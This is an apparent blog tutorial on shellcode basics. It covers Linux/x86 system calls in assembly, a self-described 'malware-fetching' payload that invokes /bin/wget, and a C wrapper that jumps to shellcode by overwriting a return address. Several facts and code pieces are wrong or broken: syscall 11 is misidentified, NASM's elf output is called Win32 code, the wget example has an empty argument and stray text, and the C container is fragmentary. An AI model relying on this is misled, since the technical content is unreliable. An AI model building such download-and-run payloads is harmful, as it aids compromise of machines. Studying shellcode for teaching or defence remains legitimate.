Exploit Payload Basics

A good place to start is defining what 'shellcode' is. According to Wikipedia: ‘shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.'

I suppose a classic example of this would be a buffer overflow, the shellcode being what’s carried into the next buffer for execution. For this to happen, there must be a vulnerability, and an exploit must be created to set things up for the shellcode to execute.


Disassembling a random sysinternals binary (an example) gives us a load of assembler code.

  • Assembler code is created with only a handful of commands (add, sub, mov, etc.) each ultimately mapped to a circuit within the microprocessor that performs a specific operation with whatever values are passed to it.
  • Each memory register (EAX, ECX or whatever) is basically a ‘buffer’ connected physically to something on the microprocessor board, whether it be a memory chip, I/O port, pretty flashing LEDs, etc. etc. It follows that a value passed to a register connected to an I/O port will result in a given output.

Shellcoding for the Linux/x86 Architecture

This principle is best illustrated with shellcode created for a UNIX-based system, as there is a definite set of system calls mapped to specific values in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register the values are stored in during runtime (in this case EAX). Meanwhile, the arguments/parameters for a system call are stored in registers EBX, ECX, EDX and several others. I haven’t the slightest idea what the equivalent is for a Windows operating system.

With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site: mov eax, 11
mov edx, 0
mov ebx,cmd
push edx
mov ecx,file
push ecx
push ebx
mov ecx,esp
int 80h

It places value ’11’ in register EAX, which refers to the *listxattr()* function in /asm-i386/unistd.h (or at least it does on my machine). Next, the code places ‘cmd‘ as an argument in EBX and ‘file‘ in ECX. It then uses the ‘push‘ instruction to cause the function to execute with both ‘*cmd*‘ and ‘file‘ as arguments. The ‘int 80h‘ causes a system interrupt that switches between the kernel and user spaces.

Our shellcode does nothing on its own, as it’s not a binary/executable. The latter must be in a specific format (ELF) in order for a UNIX system to execute it, with a data section and a text section. And just to make things more complicated, the values in our shellcode are mapped to other command arguments in the data section, as my own little malware-fetching example shows: ;/bin/cat /etc/getmalware .data
get db '/bin/wget', 0
file db ''
section .text
global _start
mov eax, 203
mov edx, 0
mov ebx,get
push edx
mov ecx,file
push ecx
push ebx
mov ecx, esp
int 80h

Payload Execution

Another problem is we can’t get the shellcode to execute unless it’s already in a buffer with the system’s instruction pointer pointing at it (which should happen after a buffer overflow). What’s needed is a C program that buffers and executes its opcode. I’ve used the Netwide Assembler (NASM), which generates the object code for Win32 systems, then used *objdump* (part of the binutils library) to get the opcodes.

To assemble the code: ` $ nasm -f elf Malware-Fetch.asm To dump the object code: $ objdump -d Malware-Fetch.o This gives us some opcodes in the second column of the output, which are reformatted and put into a little C container that should look something like: char shellcode[] =
int main()
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;